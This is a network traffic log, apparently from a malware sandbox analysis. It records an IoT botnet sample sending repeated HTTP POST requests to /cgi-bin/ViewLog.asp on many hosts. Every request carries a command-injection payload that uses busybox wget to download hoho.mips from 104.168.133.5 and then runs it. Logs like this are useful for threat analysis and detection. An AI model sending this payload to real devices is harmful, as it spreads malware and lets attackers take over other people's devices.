                                              Data Ascii: <html><head><title>Apache Tomcat/6.0.24 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.24</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              319192.168.2.144710894.122.226.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:41.817632914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              320192.168.2.145336094.122.25.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:41.826579094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              321192.168.2.143377431.41.217.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:42.602196932 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:43.707228899 CET460INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:34 GMT
                                              Server: Apache/2
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              322192.168.2.144938062.29.29.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:42.603598118 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              323192.168.2.144707685.229.198.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:43.029364109 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:43.227015018 CET328INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:21:34 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              324192.168.2.143749085.193.229.148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:43.049282074 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              325192.168.2.144708285.229.198.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:43.443521023 CET388INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:21:35 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              326192.168.2.145771095.214.145.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.591551065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.644663095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              327192.168.2.144373031.136.72.498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.965085030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:45.540807009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.660708904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.900635004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:53.508409977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.468069077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.155267000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.017728090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              328192.168.2.145757631.136.115.958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:45.796576977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.900636911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.044409037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.075841904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:31.394815922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.544786930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              329192.168.2.144337885.14.67.1318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:45.805058956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
